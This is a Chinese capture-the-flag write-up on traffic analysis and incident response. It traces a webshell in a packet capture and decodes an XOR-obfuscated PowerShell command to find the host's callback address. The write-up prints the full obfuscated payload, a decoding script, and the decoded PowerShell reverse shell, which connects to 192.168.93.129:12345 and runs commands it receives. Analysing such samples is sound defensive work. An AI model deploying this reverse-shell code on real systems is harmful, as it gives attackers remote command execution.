流量分析, 应急响应, WebShell, Powshell, XORTags:流量分析,应急响应,WebShell,Powshell,XOR
0x00. 题目
找出受攻击主机回连的IP地址和端口号
附件路径:https://pan.baidu.com/s/1GyH7kitkMYywGC9YJeQLJA?pwd=Zmxh#list/path=/CTF附件
附件名称:20250916_QQ_Powershell.zip
0x01. WP
1. 筛选POST请求,发现WebShell痕迹
http.request.method == "POST"
2. 追踪木马文件调用记录,找到可疑数字请求
cmd=echo "iEX(-JOIN((117,36,7,11,35,23,108,10,2,40,2,5,52,28,127,19,40,5,20,10,12,12,107,107,18,3,20,48,5,52,24,31,2,37,16,31,50,20,121,10,2,40,34,37,20,28,127,19,8,5,52,12,125,96,97,99,101,120,106,117,21,41,20,16,26,108,121,10,18,30,31,7,52,3,37,12,107,107,55,3,62,28,51,16,34,20,103,101,2,5,35,56,31,22,121,115,60,57,21,34,50,1,101,22,32,43,36,43,41,11,2,26,41,96,43,96,38,27,8,18,25,27,63,20,58,22,34,101,52,21,27,27,6,33,40,2,28,31,34,108,115,120,120,106,117,41,58,1,35,37,108,115,102,103,101,104,99,53,96,96,96,103,102,101,98,55,97,101,99,98,101,96,98,51,96,103,97,100,97,48,100,98,101,100,28,54,19,105,16,20,101,16,3,16,19,9,16,25,8,16,50,16,16,35,16,25,20,16,50,38,19,19,16,22,8,16,0,54,16,101,16,20,24,16,8,38,19,35,16,20,62,16,4,54,19,29,16,23,16,16,50,54,16,99,16,22,50,16,1,0,16,104,16,25,38,16,28,54,16,40,16,21,58,16,8,0,16,43,16,21,54,16,31,16,19,58,16,21,4,16,11,54,16,96,16,21,58,16,31,16,16,97,16,21,24,16,11,0,19,57,16,21,54,16,31,38,19,60,16,21,50,16,31,38,19,58,16,21,8,16,28,0,16,41,16,22,24,16,28,0,16,40,16,21,4,16,28,16,16,40,16,21,4,16,31,0,16,38,16,22,24,16,31,16,19,58,16,21,8,16,30,16,16,41,16,22,4,16,30,16,16,96,16,21,58,16,28,0,19,59,16,21,58,16,28,16,19,60,16,21,58,16,30,0,19,60,16,21,20,16,8,54,16,97,16,22,20,16,8,54,16,96,16,21,28,16,28,16,16,97,16,21,8,16,30,0,16,98,16,21,28,16,30,16,16,100,16,21,58,16,31,38,19,57,16,21,28,16,31,0,16,101,16,21,24,16,31,16,19,60,16,21,24,16,11,0,16,38,16,21,28,16,28,38,16,98,16,22,20,16,8,38,19,61,16,21,16,16,30,0,16,99,16,21,24,16,30,0,19,56,16,22,24,16,8,54,16,41,16,21,20,16,28,54,19,56,16,22,28,16,31,0,19,56,16,22,20,16,28,16,16,99,16,21,8,16,8,0,19,57,16,22,4,16,31,0,16,100,16,21,50,16,8,0,16,41,16,21,4,16,8,0,16,38,16,22,20,16,28,38,19,61,16,22,28,16,8,54,19,57,16,21,8,16,11,16,16,40,16,22,0,16,8,0,16,43,16,21,54,16,8,54,16,100,16,22,0,16,30,16,16,98,16,21,20,16,30,16,16,96,16,21,28,16,28,38,19,61,16,21,0,16,11,54,16,96,16,22,0,16,8,38,16,97,16,22,0,16,31,16,19,57,16,21,28,16,8,0,16,99,16,21,20,16,31,38,16,99,16,21,50,16,11,0,19,59,16,21,24,16,8,38,16,100,16,21,20,16,31,0,19,60,16,21,54,16,28,16,16,98,16,22,28,16,28,54,19,60,16,22,28,16,30,0,16,43,16,21,54,16,8,54,16,41,16,22,8,16,28,38,16,41,16,22,4,16,8,38,19,59,16,22,20,16,30,0,19,59,16,22,8,16,31,54,16,41,16,22,4,16,31,54,19,61,16,22,28,16,31,38,19,56,16,21,50,16,28,16,16,100,16,22,4,16,28,54,16,101,16,22,28,16,11,0,16,38,16,21,4,16,30,16,16,41,16,21,54,16,31,0,16,96,16,22,24,16,8,0,19,58,16,22,0,16,8,0,19,61,16,21,24,16,31,54,19,59,16,21,8,16,28,54,16,96,16,21,24,16,28,0,19,58,16,21,20,16,28,0,16,100,16,21,4,16,28,16,19,57,16,22,0,16,8,54,19,58,16,22,28,16,8,0,16,99,16,22,4,16,31,54,19,58,16,21,50,16,28,38,16,96,16,22,24,16,11,16,19,61,16,22,20,16,31,54,16,101,16,22,28,16,28,0,16,100,16,21,50,16,11,16,16,41,16,22,4,16,11,0,16,108,115,106,117,53,7,59,25,57,108,56,20,9,121,10,2,40,2,5,20,28,127,3,4,31,5,24,28,52,127,24,63,5,20,35,62,1,2,52,35,7,56,50,52,34,127,28,16,3,2,57,48,61,12,107,107,1,5,35,37,62,34,5,3,56,31,54,16,4,37,30,121,10,34,8,2,5,20,28,127,3,4,31,37,56,28,52,127,24,63,37,20,3,62,33,34,20,3,39,24,50,52,2,127,28,48,3,2,25,48,61,12,107,107,34,52,50,36,35,52,34,5,35,56,63,22,37,30,19,2,37,35,121,121,117,41,58,1,35,37,45,18,30,31,7,20,3,37,37,62,124,34,52,50,4,35,20,34,37,35,24,31,54,113,124,26,52,40,113,117,21,41,20,16,26,120,120,120,120,106,38,25,56,61,52,121,117,55,57,19,27,1,108,117,53,7,59,25,57,127,54,20,37,34,37,3,52,16,28,121,120,120,42,106,38,57,56,29,20,121,117,55,57,19,27,1,127,53,48,5,48,16,39,48,24,29,16,19,29,20,113,124,30,35,113,117,4,38,54,52,8,113,124,20,0,113,117,36,7,11,35,23,127,18,62,36,31,37,120,42,106,117,4,38,54,52,8,108,117,55,57,19,27,1,127,3,52,48,53,121,117,36,7,11,35,23,125,97,125,117,36,7,11,35,23,127,61,52,63,22,5,57,120,106,117,57,23,9,5,21,122,108,121,31,20,6,124,30,51,27,52,50,37,113,124,5,8,33,20,63,48,60,20,113,34,40,34,5,20,60,127,5,52,9,37,127,16,34,18,24,56,20,63,50,62,53,24,31,54,120,127,54,52,37,2,37,35,24,31,22,121,117,36,7,11,35,23,125,97,125,117,4,38,54,52,8,120,44,106,24,55,121,117,57,23,9,5,21,120,42,106,117,26,23,8,29,39,108,121,24,52,9,121,117,57,23,9,5,21,120,99,111,119,96,45,30,36,5,124,2,37,35,56,63,54,120,106,56,55,121,112,121,117,26,23,8,29,39,127,29,20,63,22,5,25,116,117,36,7,11,35,23,127,50,30,4,63,37,120,120,42,106,117,26,23,8,29,39,122,108,115,113,115,44,106,117,36,28,23,4,26,108,121,10,5,20,9,5,127,20,63,50,30,21,24,31,54,12,107,107,16,34,18,24,24,120,127,54,52,5,51,40,5,52,34,121,117,26,23,8,29,39,120,106,117,55,57,19,27,1,127,38,35,24,37,52,121,117,36,28,23,4,26,125,97,125,117,36,28,23,4,26,127,61,52,31,54,37,57,120,106,117,55,57,19,27,1,127,23,29,4,2,57,121,120,106,117,57,23,9,5,21,108,117,31,36,61,61,44,44)|%{[CHaR](`$_-BXoR 0x51)}));eXIt" | pOWersHeLL "IeX(IEx($INPUT))"&eXIT
3. 解码Powshell脚本
lstInt='... ...'
decrypted = [chr(num ^ 0x51) for num in lstInt]
print("".join(decrypted)) # $uVZrF=[SySTeM.ByTE[]]::CREaTeINStANcE([SystEM.BYTe],1024);$DxEAK=([CONVeRt]::fRoMbAsE64STriNG("mhDscP4GqzuzxZSKx1z1wJYCHJnEkGs4eDJJWpySMNs="));$xkPrt="76492d1116743f0423413b16050a5345MgB8AE4ARABXAHYAcAArAHEAcwBBAGYAQgA4AEIAYwBrAEoAUgBLAFAAcgA2AGcAPQA9AHwAMgAyADkAYQAzADgANABkADUAZgA1ADkANAA0ADIAZQBhADgANwBmADcANwBkADYAMQAxAGIAMQAyADUAMAAyADUANQAwAGIANABkADYAOAAxAGUAOAA1ADkAMQBjADkAMABmADkAOQBmADEAYgA0AGEAYgA1ADMAMAA0ADYAOQA3ADMAOAA5ADkANwBhADMANQA4ADIANABmADIAZQAwADMAMwA3AGEAYwBlADAAOQA2ADIAOQBiAGIAYgAxADEAMgBiAGMANQBiAGEAMAA2ADYAYQBhAGUANQA5ADcAYQAxADUAYQAwAGEAMwBlAGMAYgBhADYAZAAyAGQAYQAzADgAYgA5AGQAOAA3ADEAOAA1ADMAMwBlADQAZgA1AGQAYwA0AGQANABhADMAYQA2ADEANwA2ADcAZQBjADIAYwA5ADEANQBmADgAMAA3AGMAMgBmAGMAOQAzADgAYgAxAGYAMwAxAGUAYwBjAGEAOQBjAGYANgAxAGUANgBlAGMANwBiADcAMAA5AGUAMgA4AGMAZQAwADUAOAAxADgANQA1AGIAYQBkAGQAYQBlADIANgBjADYAMgA1ADIAMQBkADEAMQA5ADUAMABhAGQAYgBkAGMAYQA2AGUANgBkADcAMwA1AGIAZABlAGEANgA4AGMAMQA5ADcAZAAxAGUAZQA=";$dVjHh=iEX([SySTEM.RUNTIMe.InTEroPSerVices.MARShal]::PTrtosTRiNgAUtO([sYSTEM.RUNtiMe.IntERopsERvIceS.MaRSHal]::securesTrinGtOBStr(($xkPrt|CONVERtto-secUrEstrINg -Key $DxEAK))));wHile($fhBJP=$dVjHh.gEtstReAM()){;whiLE($fhBJP.daTaAvaILABLE -Or $UwgeY -EQ $uVZrF.CouNt){;$UwgeY=$fhBJP.Read($uVZrF,0,$uVZrF.lenGTh);$hFXTD+=(NEW-ObJect -TYpEnamE sysTEm.TeXt.AsCIiEncodINg).getStrING($uVZrF,0,$UwgeY)};If($hFXTD){;$KFYLv=(IeX($hFXTD)2>&1|OuT-String);if(!($KFYLv.LEnGTH%$uVZrF.cOUnt)){;$KFYLv+=" "};$uMFUK=([TEXT.EncODINg]::AsCII).geTbyTes($KFYLv);$fhBJP.wrIte($uMFUK,0,$uMFUK.leNgth);$fhBJP.FLUSh();$hFXTD=$Null}}
在Powshell窗口执行前部分代码
PS C:\Users\Administrator> $uVZrF=[SySTeM.ByTE[]]::CREaTeINStANcE([SystEM.BYTe],1024);$DxEAK=([CONVeRt]::fRoMbAsE64STriNG("mhDscP4GqzuzxZSKx1z1wJYCHJnEkGs4eDJJWpySMNs="));$xkPrt="76492d1116743f0423413b16050a5345MgB8AE4ARABXAHYAcAArAHEAcwBBAGYAQgA4AEIAYwBrAEoAUgBLAFAAcgA2AGcAPQA9AHwAMgAyADkAYQAzADgANABkADUAZgA1ADkANAA0ADIAZQBhADgANwBmADcANwBkADYAMQAxAGIAMQAyADUAMAAyADUANQAwAGIANABkADYAOAAxAGUAOAA1ADkAMQBjADkAMABmADkAOQBmADEAYgA0AGEAYgA1ADMAMAA0ADYAOQA3ADMAOAA5ADkANwBhADMANQA4ADIANABmADIAZQAwADMAMwA3AGEAYwBlADAAOQA2ADIAOQBiAGIAYgAxADEAMgBiAGMANQBiAGEAMAA2ADYAYQBhAGUANQA5ADcAYQAxADUAYQAwAGEAMwBlAGMAYgBhADYAZAAyAGQAYQAzADgAYgA5AGQAOAA3ADEAOAA1ADMAMwBlADQAZgA1AGQAYwA0AGQANABhADMAYQA2ADEANwA2ADcAZQBjADIAYwA5ADEANQBmADgAMAA3AGMAMgBmAGMAOQAzADgAYgAxAGYAMwAxAGUAYwBjAGEAOQBjAGYANgAxAGUANgBlAGMANwBiADcAMAA5AGUAMgA4AGMAZQAwADUAOAAxADgANQA1AGIAYQBkAGQAYQBlADIANgBjADYAMgA1ADIAMQBkADEAMQA5ADUAMABhAGQAYgBkAGMAYQA2AGUANgBkADcAMwA1AGIAZABlAGEANgA4AGMAMQA5ADcAZAAxAGUAZQA=";
PS C:\Users\Administrator> [SySTEM.RUNTIMe.InTEroPSerVices.MARShal]::PTrtosTRiNgAUtO([sYSTEM.RUNtiMe.IntERopsERvIceS.MaRSHal]::securesTrinGtOBStr(($xkPrt|CONVERtto-secUrEstrINg -Key $DxEAK)))
New-Object System.Net.Sockets.TCPClient('192.168.93.129',12345)
得到回连IP和端口为192.168.93.129:12345
)
 - 指南)
 - 指南)
